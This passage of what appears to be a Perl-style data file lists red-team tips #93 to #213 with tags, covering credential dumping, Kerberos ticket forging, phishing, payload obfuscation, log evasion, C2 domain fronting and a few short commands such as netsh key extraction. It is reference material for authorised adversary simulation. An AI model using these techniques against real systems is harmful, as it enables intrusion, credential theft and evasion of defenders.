881 | ) 882 | ), 883 | %(tips => 'Red tip #93: Use Empyre to generate Macintosh and Linux payloads, modify it to contain code for Windows too! https://github.com/EmpireProject/EmPyre', tags => @( 884 | 'redtip', '#93', 'Empire', 'MAC', 'linux', 'payload', 'Empyre' 885 | ) 886 | ), 887 | %(tips => 'Red tip #94: Client uses VDIs? Compromise underlying host and use Citrix Shadow Taskbar to spy on VDI sessions by selecting username', tags => @( 888 | 'redtip', '#94', 'VDI', 'Citrix', 'host' 889 | ) 890 | ), 891 | %(tips => 'Red tip #95: @domchell recommends avoiding non persistent VDIs and persist on laptops. Query DC for live laptops.', tags => @( 892 | 'redtip', '#95', 'VDI', 'persistence', 'DC', 'laptop' 893 | ) 894 | ), 895 | %(tips => 'Red tip #96: @lucasgates recommends using OLE objects containing VBS scripts instead of Macros as less suspicious. VBE will work too', tags => @( 896 | 'redtip', '#96', 'OLE', 'VBS', 'scripts', 'Macros', 'VBE' 897 | ) 898 | ), 899 | %(tips => 'Red tip #97: Use recent critical vulnerabilities such as CVE-2017-0199 HTA handler issue to simulate real threats. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/', tags => @( 900 | 'redtip', '#97', 'vulnerabilities', 'CVE', 'HTA' 901 | ) 902 | ), 903 | %(tips => 'Red tip #98: @0x09AL suggests WordSteal. You can embed an IMAGE with UNC path to steal hashes from Word. Wont work if proxy. https://github.com/0x09AL/WordSteal', tags => @( 904 | 'redtip', '#98', 'WordSteal', 'image', 'UNC', 'word' 905 | ) 906 | ), 907 | %(tips => 'Red tip #99: If client is using Proxy with WebDav you can phish creds using @ryHanson Phishery https://github.com/ryhanson/phishery', tags => @( 908 | 'redtip', '#99', 'client', 'Proxy', 'WebDav', 'phish', 'creds' 909 | ) 910 | ), 911 | %(tips => 'Red tip #100: Use wgsidav if you need a quick WebDav server :) https://github.com/mar10/wsgidav', tags => @( 912 | 'redtip', '#100', 'wgsidav', 'webdav', 'server' 913 | ) 914 | ), 915 | %(tips => 'Red tip #101: Set up red team infrastructure following @bluscreenofjeff guidelines! https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki', tags => @( 916 | 'redtip', '#101', 'red team', 'infrastructure', 'jeff', 'wiki' 917 | ) 918 | ), 919 | %(tips => 'Red tip #102: Easier DNS redirector! https://pastebin.com/LNj4zjFs for opsec and not hosting C2 on the cloud', tags => @( 920 | 'redtip', '#102', 'DNS', 'redirector', 'opsec', 'c2' 921 | ) 922 | ), 923 | %(tips => 'Red tip #103: Red team tips are useful but what makes the good red teamer is experience. Rack up that breadth of experience', tags => @( 924 | 'redtip', '#103', 'experience', 'tips' 925 | ) 926 | ), 927 | %(tips => 'Red tip #104: SessionGopher does a decent job at retrieving putty and RDP history - https://github.com/fireeye/SessionGopher', tags => @( 928 | 'redtip', '#104', 'SessionGopher', 'putty', 'RDP', 'history' 929 | ) 930 | ), 931 | %(tips => 'Red tip #105: If ping 8.8.8.8 works, try ICMP tunneling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll though only on immature network', tags => @( 932 | 'redtip', '#105', 'ping', 'ICMP', 'tunneling' 933 | ) 934 | ), 935 | %(tips => 'Red tip #106: Wordlists? https://github.com/berzerk0/Probable-WordlistsI like to use the top probable 297 million list with Deadhobo rules', tags => @( 936 | 'redtip', '#106', 'Wordlists', 'rules', 'list' 937 | ) 938 | ), 939 | %(tips => 'Red tip #107: More of a pentest tip but nslookup http://google.com if it resolves you may have a DNS tunneling problem.', tags => @( 940 | 'redtip', '#017', 'pentest', 'nslookup', 'DNS', 'tunneling' 941 | ) 942 | ), 943 | %(tips => 'Red tip #108: Post exploitation Asset Discovery https://github.com/vysec/Invoke-DNSDiscovery looks for assets by name that might be good if youre low priv user.', tags => @( 944 | 'redtip', '#108', 'exploitation', 'asset', 'DNS', 'user' 945 | ) 946 | ), 947 | %(tips => 'Red tip #109: Use Invoke-ProcessScan to give some running processes context on a system. This uses EQGRP leaked list- https://github.com/vysec/Invoke-ProcessScan', tags => @( 948 | 'redtip', '#109', 'process', 'scan', 'EQGRP' 949 | ) 950 | ), 951 | %(tips => 'Red tip #110: Mature blue? Be careful and minidump lssas.exe then download it and parse locally', tags => @( 952 | 'redtip', '#110', 'mature', 'blue', 'minidump', 'lssas' 953 | ) 954 | ), 955 | %(tips => 'Red tip #111: Found an exploitable S4U condition? Use Mistique to attack! https://github.com/machosec/Mystique/blob/master/Mystique.ps1', tags => @( 956 | 'redtip', '#111', 'S4U', 'Mistique' 957 | ) 958 | ), 959 | %(tips => 'Red tip #112: Need to use VNC as RDP in use? https://github.com/artkond/Invoke-Vnc has been pretty stable for me. Run it then pivot in and connect!', tags => @( 960 | 'redtip', '#112', 'VNC', 'RDP', 'pivot' 961 | ) 962 | ), 963 | %(tips => 'Red tip #113: Found super secret.doc or master password database.xlsx? Use office2john to get hash and crack in Hashcat!', tags => @( 964 | 'redtip', '#113', 'password', 'database', 'xlsx', 'hashcat' 965 | ) 966 | ), 967 | %(tips => 'Red tip #114: PowerUp didnt work and you want to autoruns? Dont bother going on disk, use Invoke-AutoRuns to csv- https://github.com/p0w3rsh3ll/AutoRuns', tags => @( 968 | 'redtip', '#114', 'PowerUp', 'autoruns', 'powershell' 969 | ) 970 | ), 971 | %(tips => 'Red tip #115: Need to zip up a directory quickly for easy exfiltration? Eg. Home shares https://github.com/thoemmi/7Zip4Powershell use Powershell', tags => @( 972 | 'redtip', '#115', 'zip', 'exfil', 'powershell' 973 | ) 974 | ), 975 | %(tips => 'Red tip #116: Use CatMyFish to search for categorised domains that could be used in your engagements - https://github.com/Mr-Un1k0d3r/CatMyFish', tags => @( 976 | 'redtip', '#116', 'CatMyFish', 'domains', 'engagements' 977 | ) 978 | ), 979 | %(tips => 'Red tip #117: Ran Invoke-MapDomainTrusts from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph - https://github.com/sixdub/DomainTrustExplorer', tags => @( 980 | 'redtip', '#117', 'PowerView', 'domain', 'trust', 'graph' 981 | ) 982 | ), 983 | %(tips => 'Red tip #118: FOCA finds some useful information for OSINT and intelligence phases. https://www.elevenpaths.com/labstools/foca/index.html', tags => @( 984 | 'redtip', '#118', 'FOCA', 'OSINT', 'intelligence' 985 | ) 986 | ), 987 | %(tips => 'Red tip #119: GoPhish is a pretty useful tool for spinning up simple phishing campaigns especially for decoys https://getgophish.com', tags => @( 988 | 'redtip', '#119', 'GoPhish', 'tool', 'phishing', 'email', 'campaigns' 989 | ) 990 | ), 991 | %(tips => 'Red tip #120: If you have write access to the orgs shared Office template folders You can privesc by backdooring these trusted documents.', tags => @( 992 | 'redtip', '#120', '', '', '' 993 | ) 994 | ), 995 | %(tips => 'Red tip #121: @zwned uses netsh packet tracing to sniff natively from victim host. Save capture and analyze offline!', tags => @( 996 | 'redtip', '#121', 'netsh', 'packet', 'sniff', 'capture' 997 | ) 998 | ), 999 | %(tips => 'Red tip #122: More decoy tips! Scan the external perimeter with tools like Nessus and OpenVAS. More traffic the better just to burn the blue', tags => @( 1000 | 'redtip', '#122', 'decoy', 'external', 'perimeter', 'Nessus', 'OpenVAS' 1001 | ) 1002 | ), 1003 | %(tips => 'Red tip #123: Read Sean Metcalfa blog http://adsecurity.org/ When AD is used in many environments, it vital to at least know techniques', tags => @( 1004 | 'redtip', '#123', 'AD', 'environments', 'techniques' 1005 | ) 1006 | ), 1007 | %(tips => 'Red tip #124: Remember you can generate a golden ticket offline with knowledge of krbtgt and rest offline. Golden ticket gets silver from DC', tags => @( 1008 | 'redtip', '#124', 'golden', 'ticket', 'krbtgt', 'DC', 'silver' 1009 | ) 1010 | ), 1011 | %(tips => 'Red tip #125: Got krbtgt of a child domain? Forest parent trusts you? Use the SID history attack in golden tickets to escalate to Ent Admin', tags => @( 1012 | 'redtip', '#125', 'krbtgt', 'domain', 'Forest', 'trust', 'SID', 'admin' 1013 | ) 1014 | ), 1015 | %(tips => 'Red tip #126: You dont necessarily need Domain Admin, if you have an account that has "Replicating directory changes", dcsync to pull hash', tags => @( 1016 | 'redtip', '#126', 'domain', 'admin', 'account', 'dcsync', 'hash' 1017 | ) 1018 | ), 1019 | %(tips => 'Red tip #127: Planning to use secretsdump.py? :) Try using the DC machine account to authenticate and dump instead of a user! Save hash', tags => @( 1020 | 'redtip', '#127', 'secretsdump', 'DC', 'machine', 'account', 'authenticate', 'dump', 'hash' 1021 | ) 1022 | ), 1023 | %(tips => 'Red tip #128: Use machine account hashes to generate silver tickets to a host for persistence. Save machine hash for DC incase krbtgt rotate', tags => @( 1024 | 'redtip', '#128', 'machine', 'account', 'hashes', 'ticket', 'persistence', 'DC', 'krbtgt' 1025 | ) 1026 | ), 1027 | %(tips => 'Red tip #129: Use PEAS to query shares and emails if using ActiveSync - https://github.com/mwrlabs/peas', tags => @( 1028 | 'redtip', '#129', 'PEAS', 'shares', 'emails', 'ActiveSync' 1029 | ) 1030 | ), 1031 | %(tips => 'Red tip #130: (Not red really but useful) Sort IPs: cat IPs.txt | sort -t . -k1,1 -k2,2 -k3,3 -k4,4', tags => @( 1032 | 'redtip', '#130', 'IP', 'cat', 'sort' 1033 | ) 1034 | ), 1035 | %(tips => 'Red tip #131: Learn AWK and general bash scripting. Processing and merging of data sets speeds up our job for discovery and time keeping.', tags => @( 1036 | 'redtip', '#131', 'AWK', 'bash', 'scripting', 'data' 1037 | ) 1038 | ), 1039 | %(tips => 'Red tip #132: Worth learning to pick locks and the dust can sensor trick if youre going to do some physical. http://www.artofmanliness.com/2014/11/19/how-to-pick-a-lock-pin-tumbler-locks/', tags => @( 1040 | 'redtip', '#132', 'lock', 'dust', 'physical', 'pick' 1041 | ) 1042 | ), 1043 | %(tips => 'Red tip #133: Grep has an extract flag -o that can be used to extract from a regex. Good for extracting data from massive blobs.', tags => @( 1044 | 'redtip', '#133', 'grep', 'flag', 'regex', 'blobs' 1045 | ) 1046 | ), 1047 | %(tips => 'Red tip #134: Victims use wireless? Use KARMA attack to force them onto your network. Use eternalblue, domain creds or other vulns to get in. https://github.com/sensepost/mana', tags => @( 1048 | 'redtip', '#134', 'wireless', 'KARMA', 'network', 'eternalblue', 'domain' 1049 | ) 1050 | ), 1051 | %(tips => 'Red tip #135: Phishing pages are usually custom. However its always good to have a stash for decoys. Generic Gmail, Office365?', tags => @( 1052 | 'redtip', '#135', 'phishing', 'decoy', 'gmail', 'Office365' 1053 | ) 1054 | ), 1055 | %(tips => 'Red tip #136: Keep up to date by watching presentations from conferences on YouTube :) Discover useful techniques', tags => @( 1056 | 'redtip', '#136', 'presentation', 'conferences', 'YouTube' 1057 | ) 1058 | ), 1059 | %(tips => 'Red tip #137: If youve exhausted all payload types, try sending a Mac user a python one liner and Win PS 1 liner. Ive had people run it.', tags => @( 1060 | 'redtip', '#137', 'payload', 'Mac', 'python', 'one-liner' 1061 | ) 1062 | ), 1063 | %(tips => 'Red tip #139: If you need to get a clean EXE for file drop and exec, try out @midnite_runr Backdoor Factory - https://github.com/secretsquirrel/the-backdoor-factory', tags => @( 1064 | 'redtip', '#139', 'EXE', 'file', 'backdoor', 'factory' 1065 | ) 1066 | ), 1067 | %(tips => 'Red tip #140: If enemy does not use proxy with TLS inspection then you can use https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/ to mask your c2 channel further', tags => @( 1068 | 'redteam', '#140', 'proxy', 'TLS', 'c2', 'domains' 1069 | ) 1070 | ), 1071 | %(tips => 'Red tip #141: On a Linux box and want to egress from it over a proxy? Use ProxyTunnel to pipe SSH - https://github.com/proxytunnel/proxytunnel', tags => @( 1072 | 'redtip', '#141', 'linux', 'egress', 'proxy', 'Tunnel', 'SSH' 1073 | ) 1074 | ), 1075 | %(tips => 'Red tip #142: Need some OSINT? Keep Spiderfoot running long term to accompany your manual OSINT sources http://www.spiderfoot.net', tags => @( 1076 | 'redtip', '#142', 'OSINT', 'Spiderfoot' 1077 | ) 1078 | ), 1079 | %(tips => 'Red tip #143: OSINTing? TheHarvester does a decent job at subdomains. Though theres better ways to get emails bulk. https://github.com/laramies/theHarvester', tags => @( 1080 | 'redtip', '#143', 'OSINT', 'Harvester', 'subdomains', 'emails' 1081 | ) 1082 | ), 1083 | %(tips => 'Red tip #144: Exploring and want to use WMI? https://www.microsoft.com/en-us/download/details.aspx?id=8572 is pretty useful for exploring the different namespaces and classes.', tags => @( 1084 | 'redtip', '#144', 'WMI', 'namespace', 'classes' 1085 | ) 1086 | ), 1087 | %(tips => 'Red tip #145: Need to reset a password? Do it then quickly dcsync for previous password hash and use NTLMinject - https://github.com/vletoux/NTLMInjector', tags => @( 1088 | 'redtip', '#145', 'password', 'dcsync', 'hash', 'NTLM', 'inject' 1089 | ) 1090 | ), 1091 | %(tips => 'Red tip #146: IDS flagging known payload binary blob? Base64 encode it in your payload and use certutil, PS or VB to decode it!', tags => @( 1092 | 'redtip', '#146', 'IDS', 'payload', 'binary', 'base64', 'certutil' 1093 | ) 1094 | ), 1095 | %(tips => 'Red tip #147: Test your phishing campaigns before sending!!!', tags => @( 1096 | 'redtip', '#147', 'phishing', 'campaign', 'email' 1097 | ) 1098 | ), 1099 | %(tips => 'Red tip #148: If youre sending into Exchange, make sure your SMTP server is not in SPAM list or black lists. Check junk mails mail headers', tags => @( 1100 | 'redtip', '#148', 'Exchange', 'SMTP', 'SPAM', 'email' 1101 | ) 1102 | ), 1103 | %(tips => 'Red tip #149: Use Microsofts Message Header Analyzer to parse and review email headers from Outlook. https://testconnectivity.microsoft.com/MHA/Pages/mha.aspx', tags => @( 1104 | 'redtip', '#149', 'Microsoft', 'message', 'email', 'Outlook' 1105 | ) 1106 | ), 1107 | %(tips => 'Red tip #150: Make sure phishing emails Bounce header matches From. Or else some will flag as malicious.', tags => @( 1108 | 'redtip', '#150', 'phishing', 'emails', 'flag', 'header' 1109 | ) 1110 | ), 1111 | %(tips => 'Red tip #151: DomainHunter also looks for good candidate expired domains - https://github.com/minisllc/domainhunter', tags => @( 1112 | 'redtip', '#151', 'Domain', 'Hunter', 'domains' 1113 | ) 1114 | ), 1115 | %(tips => 'Red tip #152: Want to scrape MetaData in CLI? Use PowerMeta. Linux users can use PowerShell too! https://github.com/dafthack/PowerMeta', tags => @( 1116 | 'redtip', '#152', 'MetaData', 'CLI', 'linux', 'PowerShell' 1117 | ) 1118 | ), 1119 | %(tips => 'Red tip #153: RDP in use? Dont want to use VNC? Try mimikatzs ts::multirdp in memory patch by @gentilkiwi', tags => @( 1120 | 'redtip', '#153', 'RDP', 'VNC', 'mimikatz', 'memory' 1121 | ) 1122 | ), 1123 | %(tips => 'Red tip #154: Admin on a machine with VPN client? certificate extraction using Mimikatz by @gentilkiwi. Dont forget to dl configs. Backdoor', tags => @( 1124 | 'redtip', '#154', 'Admin', 'machine', 'VPN', 'certificate', 'mimikatz', 'backdoor' 1125 | ) 1126 | ), 1127 | %(tips => 'Red tip #155: Master all the quick wins to Domain privilege escalation. When youre pressured to get DA in 15 mins, you want to know you can', tags => @( 1128 | 'redtip', '#155', 'domain', 'privesc', 'DA', 'escalation' 1129 | ) 1130 | ), 1131 | %(tips => 'Red tip #156: @Akijos notes that we should be careful when using silver tickets with scheduled tasks. Author is the user account youre on.', tags => @( 1132 | 'redtip', '#156', 'silver', 'tickets', 'account', 'user' 1133 | ) 1134 | ), 1135 | %(tips => 'Red tip #157: If you dont need a golden ticket, dont generate it.', tags => @( 1136 | 'redtip', '#157', 'golden', 'ticket', 'generate' 1137 | ) 1138 | ), 1139 | %(tips => 'Red tip #158: Scan a DNS server for Alexa top 1 million spoofable domains :) Ive got a massive list, do you?', tags => @( 1140 | 'redtip', '#158', 'DNS', 'server', 'Alexa', 'domains' 1141 | ) 1142 | ), 1143 | %(tips => 'Red tip #159: Scan the internet for a list of domain frontable domains! Ive got a big big list ready for whenever I want to use them :)', tags => @( 1144 | 'redtip', '#159', 'scan', 'internet', 'domain', 'fronting' 1145 | ) 1146 | ), 1147 | %(tips => 'Red tip #160: We all know people share credentials between different services. Try these credentials on other accounts owned by the user!', tags => @( 1148 | 'redtip', '#160', 'credentials', 'services', 'accounts', 'user' 1149 | ) 1150 | ), 1151 | %(tips => 'Red tip #161: Cant crack a password? Try the users previous passwords from history in AD. They may follow a pattern.', tags => @( 1152 | 'redtip', '#161', 'password', 'crack', 'history', 'AD' 1153 | ) 1154 | ), 1155 | %(tips => 'Red tip #162: Cant crack a hash owned by a user? Take all previously discovered passwords from their files and generate a new word list.', tags => @( 1156 | 'redtip', '#162', 'hash', 'crack', 'password', 'files', 'wordlist' 1157 | ) 1158 | ), 1159 | %(tips => 'Red tip #163: Cant crack a password? Make sure these are in your word list: name of company, town, capital, country, months! Appear a lot.', tags => @( 1160 | 'redtip', '#163', 'crack', 'password', 'wordlist' 1161 | ) 1162 | ), 1163 | %(tips => 'Red tip #164: Didier Stevens has SelectMyParent tool that lets you spawn a child process with an arbitrary parent. https://blog.didierstevens.com/2017/03/20/that-is-not-my-child-process/', tags => @( 1164 | 'redtip', '#164', 'tool', 'SelectMyParent', 'process', 'parent' 1165 | ) 1166 | ), 1167 | %(tips => 'Red tip #165: Using SelectMyParent stops those detections eg. powershell.exe spawning cmd.exe. @armitagehackers CobaltStrike has ppid cmd!', tags => @( 1168 | 'redtip', '#165', 'powershell.exe', 'cmd.exe', 'detections', 'CobaltStrike' 1169 | ) 1170 | ), 1171 | %(tips => 'Red tip #166: Use PowerPoint mouse over text to invoke a powershell command one liner. #adversarysimulation - https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/', tags => @( 1172 | 'redtip', '#166', 'PowerPoint', 'powershell', 'one-liner', 'adversary' 1173 | ) 1174 | ), 1175 | %(tips => 'Red tip #167: Follow @mattifestation to keep up to date with blue team advances. Just in case blue is actually up to date with mitigations!', tags => @( 1176 | 'redtip', '#167', 'mitigation', 'mattifestation', 'blue', 'team' 1177 | ) 1178 | ), 1179 | %(tips => 'Red tip #168: Using VBS or JS? Cant stage using PowerShell.exe as blocked? @Cneelis released https://github.com/Cn33liz/StarFighters so you can keep use PS', tags => @( 1180 | 'redtip', '#168', 'VBS', 'JS', 'powershell', 'stage', 'StarFighters' 1181 | ) 1182 | ), 1183 | %(tips => 'Red tip #169: Not sure who uses Wi-Fi webcams but go run a mass deauth attack if youre going to plan on breaking in physically to discon', tags => @( 1184 | 'redtip', '#169', 'WiFi', 'webcam', 'deauth', 'physical' 1185 | ) 1186 | ), 1187 | %(tips => 'Red tip #170: @malcomvetter Never use defaults - run Mimikatz with AES and 8 hour tickets to avoid passive detection from NG defense tools!', tags => @( 1188 | 'redtip', '#170', '', '', '' 1189 | ) 1190 | ), 1191 | %(tips => 'Red tip #171: Win XP doesnt have PowerShell? Try using Unmanaged powershell to keep using your favourite scripts!', tags => @( 1192 | 'redtip', '#171', 'XP', 'powershell', 'unmanaged', 'scripts' 1193 | ) 1194 | ), 1195 | %(tips => 'Red tip #172: @anthonykasza tells us that the at.exe command takes base64 encoded Params! Eg. at.exe b64::[encoded params]', tags => @( 1196 | 'redtip', '#172', 'at', 'command', 'base64', 'encoded' 1197 | ) 1198 | ), 1199 | %(tips => 'Red tip #173: Grab cleartext wireless keys: netsh wlan show profile name="ssid" key=clear', tags => @( 1200 | 'redtip', '#173', 'wireless', 'netsh', 'wlan', 'ssid' 1201 | ) 1202 | ), 1203 | %(tips => 'Red tip #174: Got a shell on a victim without admin? Want their creds? Try Inveigh then rpcping -s 127.0.0.1 -t ncacn_np to leak hash.', tags => @( 1204 | 'redtip', '#174', 'shell', 'admin', 'creds', 'Inveigh', 'rpcping' 1205 | ) 1206 | ), 1207 | %(tips => 'Red tip #175: Got a low priv shell and need creds? Use Invoke-LoginPrompt by @enigma0x3 https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1', tags => @( 1208 | 'redtip', '#175', 'shell', 'creds', 'Login', 'Prompt' 1209 | ) 1210 | ), 1211 | %(tips => 'Red tip #176: Get access to shadow admin accounts, they can DCsync and are essentially DA. https://www.cyberark.com/threat-research-blog/shadow-admins-stealthy-accounts-fear/', tags => @( 1212 | 'redtip', '#176', 'access', 'shadow', 'admin', 'accounts', 'dcsync', 'DA' 1213 | ) 1214 | ), 1215 | %(tips => 'Red tip #177: If blue detects PTH. Try extract Kerberos tickets and PTT.', tags => @( 1216 | 'redtip', '#177', 'blue', 'PTH', 'kerberos', 'tickets', 'PTT' 1217 | ) 1218 | ), 1219 | %(tips => 'Red tip #178: @lefterispan wrote https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2 … which sets up a proxy and forces an auth attempt to it to leak hash. Low priv leak.', tags => @( 1220 | 'redtip', '#178', 'proxy', 'auth', 'hash' 1221 | ) 1222 | ), 1223 | %(tips => 'Red tip #179: When creating phishing pages, try cloning and modifying parts of the client’s own webpages. For example of their VPN login!', tags => @( 1224 | 'redtip', '#179', 'phish', 'cloning', 'webpage', 'VPN', 'login' 1225 | ) 1226 | ), 1227 | %(tips => 'Red tip #180: Regardless of whether there are known defenses. Run your PS scripts through Obfuscation before loading into memory.', tags => @( 1228 | 'redtip', '#180', 'defenses', 'powershell', 'scripts', 'Obfuscation', 'memory' 1229 | ) 1230 | ), 1231 | %(tips => 'Red tip #181: Stuck trying to find those assets still? Try @424f424f Get-BrowserData https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Get-BrowserData.ps1', tags => @( 1232 | 'redtip', '#181', 'assets', 'Browser', 'data', 'powershell' 1233 | ) 1234 | ), 1235 | %(tips => 'Red tip #182: Follow @JohnLaTwC as he tweets phishing examples and sometimes with new techniques used in Wild. Good for adversary simulation', tags => @( 1236 | 'redtip', '#182', 'phishing', 'adversary', 'simulation' 1237 | ) 1238 | ), 1239 | %(tips => 'Red tip #183: @MrUn1k0d3r released https://github.com/Mr-Un1k0d3r/SCT-obfuscator … can probably bypass Gateway signatures when performing SCT delivery for regsvr32! https://github.com/Mr-Un1k0d3r/SCT-obfuscator', tags => @( 1240 | 'redtip', '#183', 'SCT', 'bypass', 'delivery', 'regsvr32' 1241 | ) 1242 | ), 1243 | %(tips => 'Red tip #184: We always talk about Windows and AD. But now let’s have a look at Linux and AD with https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9', tags => @( 1244 | 'redtip', '#184', 'windows', 'AD', 'linux' 1245 | ) 1246 | ), 1247 | %(tips => 'Red tip #185: Use WSUS for lateral movement https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1', tags => @( 1248 | 'redtip', '#185', 'WSUS', 'lateral movement', 'pivot' 1249 | ) 1250 | ), 1251 | %(tips => 'Red tip #186: View @jpcert https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf … and look at all those indicators and artifacts left behind. Then hexedit those tools :+1:', tags => @( 1252 | 'redtip', '#186', 'artifacts', 'research', 'hexedit' 1253 | ) 1254 | ), 1255 | %(tips => 'Red tip #187: Found a portal using 2FA? Using RSA SecureID? https://blog.netspi.com/targeting-rsa-emergency-access-tokencodes-fun-profit/ … Pin bruteforce!', tags => @( 1256 | 'redtip', '#187', 'portal', 'web', 'secureID' 1257 | ) 1258 | ), 1259 | %(tips => 'Red tip #188: @pwnagelabs says to avoid bash history on exit using: kill -9 $$', tags => @( 1260 | 'redtip', '#188', 'bash', 'history', 'kill' 1261 | ) 1262 | ), 1263 | %(tips => 'Red tip #189: @pwnagelabs teaches us how to avoid wtmp logging with: ssh -l user target -T', tags => @( 1264 | 'redtip', '#189', 'wtmp', 'logging', 'ssh' 1265 | ) 1266 | ), 1267 | %(tips => 'Red tip #190: @bluscreenofjeff shows us how to use Apache Mod rewrite to randomly serve different payloads https://bluescreenofjeff.com/2017-06-13-serving-random-payloads-with-apache-mod_rewrite/', tags => @( 1268 | 'redtip', '#190', 'Apache', 'payload', 'rewrite', 'jeff' 1269 | ) 1270 | ), 1271 | %(tips => 'Red tip #191: Domain user? Query LDAP for Printers. Attempt default creds or known vulns then read Service account creds, hash or relay', tags => @( 1272 | 'redtip', '#191', 'domain', 'LDAP', 'Printers', 'creds', 'vulns', 'account', 'hash' 1273 | ) 1274 | ), 1275 | %(tips => 'Red tip #192: Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DC001 | Export-CSV -not dns.csv', tags => @( 1276 | 'redtip', '#192', 'gmwi', 'wmi', 'DNS', 'csv' 1277 | ) 1278 | ), 1279 | %(tips => 'Red tip #193: Password protected doc in email? For some reason a lot of people send the password separately to the same inbox. #epicfail', tags => @( 1280 | 'redtip', '#193', 'password', 'doc', 'email', 'inbox' 1281 | ) 1282 | ), 1283 | %(tips => 'Red tip #194: Can’t see another part of the network and there’s a DC? Pivot off the DC :)', tags => @( 1284 | 'redtip', '#194', 'network', 'DC', 'pivot' 1285 | ) 1286 | ), 1287 | %(tips => 'Red tip #195: C:\windows\system32\inetsrv\appcmd list site to find IIS bindings.', tags => @( 1288 | 'redtip', '#195', 'appcmd', 'IIS' 1289 | ) 1290 | ), 1291 | %(tips => 'Red tip #196: DA -> Locate DB -> Found MSSQL? https://github.com/NetSPI/PowerUpSQL use PowerUpSQL to enumerate and privesc by stealing tokens.', tags => @( 1292 | 'redtip', '#196', 'DA', 'DB', 'MSSQL', 'PowerUpSQL', 'enumerate', 'privesc' 1293 | ) 1294 | ), 1295 | %(tips => 'Red tip #197: If ACL doesn’t let you read other users’ home shares, you can try net view \fileserv /all to try other shares and folders!', tags => @( 1296 | 'redtip', '#197', 'ACL', 'shares', 'net', 'view', 'folders' 1297 | ) 1298 | ), 1299 | %(tips => 'Red tip #198: Username jondoe and jondoe-x? Ones an Admin? Try same password. May be shared :sunglasses: repeat for entire user list.', tags => @( 1300 | 'redtip', '#198', 'username', 'Admin', 'password', 'shared', 'list' 1301 | ) 1302 | ), 1303 | %(tips => 'Red tip #199: Failed to phish? Payloads failing? Mac users? Write an email and ask them to open terminal and paste in python Empyre one line', tags => @( 1304 | 'redtip', '#199', 'phish', 'payload', 'mac', 'users', 'email', 'python', 'Empyre' 1305 | ) 1306 | ), 1307 | %(tips => 'Red tip #200: @_wald0 blessed us with this BH cypher query to skip specific nodes to look for other paths. https://pastebin.com/qAzH9uji', tags => @( 1308 | 'redtip', '#200', 'BH', 'cypher', 'nodes' 1309 | ) 1310 | ), 1311 | %(tips => 'Red tip #201: @424f424f pushed some research into LNK files inside CAB can be used to bypass the Attachment Manager :+1:http://www.rvrsh3ll.net/blog/informational/bypassing-windows-attachment-manager/', tags => @( 1312 | 'redtip', '#201', 'research', 'LNK', 'CAB', 'bypass' 1313 | ) 1314 | ), 1315 | %(tips => 'Red tip #202: When domain fronting, your calls hit the edge node, so every domain you use potentially hits a different a IP! :sunglasses:', tags => @( 1316 | 'redtip', '#202', 'domain', 'fronting', 'IP', 'node' 1317 | ) 1318 | ), 1319 | %(tips => 'Red tip #203: If using @Cneelis StarFighter. Instead of using a staged web delivery, just stick while stageless payload as encoded block in!', tags => @( 1320 | 'redtip', '#203', 'StarFighter', 'web', 'delivery', 'payload', 'encoded' 1321 | ) 1322 | ), 1323 | %(tips => 'Red tip #204: Printers are often good MAC addresses to use to beat NAC when physical red teaming as printers (mostly?) don’t support 802.1x', tags => @( 1324 | 'redtip', '#204', 'Printers', 'MAC', 'addresses', '802.1x' 1325 | ) 1326 | ), 1327 | %(tips => 'Red tip #205: If proxy is blocking SCT file, replace with and add around the rest. Thx @subTee', tags => @( 1328 | 'redtip', '#205', 'proxy', 'SCT', 'file' 1329 | ) 1330 | ), 1331 | %(tips => 'Red tip #206: CobaltStrike VNC not working? Here is a workaround using @artkond Invoke-VNC https://github.com/vysec/Aggressor-VYSEC/blob/master/vnc-psh.cna', tags => @( 1332 | 'redtip', '#206', 'cobaltstrike', 'VNC', 'Invoke-VNC' 1333 | ) 1334 | ), 1335 | %(tips => 'Red tip #207: Got C2 on Windows user but no credentials? Leak a hash using @leftp code. Implemented into CNA https://github.com/vysec/Aggressor-VYSEC/blob/master/Invoke-CredLeak.ps1', tags => @( 1336 | 'redtip', '#207', 'C2', 'windows', 'user', 'credentials', 'hash' 1337 | ) 1338 | ), 1339 | %(tips => 'Red tip #208: @Nebulator spoke on IP regex by IR at #SnoopCon. @armitagehacker CNA to automate https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna', tags => @( 1340 | 'redtip', '#208', 'IP', 'regex', 'IR', 'ping', 'cna' 1341 | ) 1342 | ), 1343 | %(tips => 'Red tip #209: Automate environment prepping and spawn all processes as a child of explorer.exe by @armitagehacker https://github.com/vysec/Aggressor-VYSEC/blob/master/auto-prepenv.cna', tags => @( 1344 | 'redtip', '#209', 'automate', 'environment', 'processes', 'explorer.exe' 1345 | ) 1346 | ), 1347 | %(tips => 'Red tip #210: @subTee highlighted to us that XML requests can be used as a download cradle in constrained language mode!', tags => @( 1348 | 'redtip', '#210', 'XML', 'download', 'cradle', 'language' 1349 | ) 1350 | ), 1351 | %(tips => 'Red tip #211: Check out @armitagehacker post on OPSEC considerations when using a CobaltStrike beacon. https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/', tags => @( 1352 | 'redtip', '#211', 'cobaltstrike', 'beacon', 'opsec' 1353 | ) 1354 | ), 1355 | %(tips => 'Red tip #212: Reset AD passwords from Linux with @mubix https://room362.com/post/2017/reset-ad-user-password-with-linux/ :) proxychains it over your pivot :D', tags => @( 1356 | 'redtip', '#212', 'AD', 'password', 'linux', 'proxychains', 'pivot' 1357 | ) 1358 | ), 1359 | %(tips => 'Red tip #213: Got a NetNTLMv1 hash? Convert it to NTLM by cracking three DES keys: 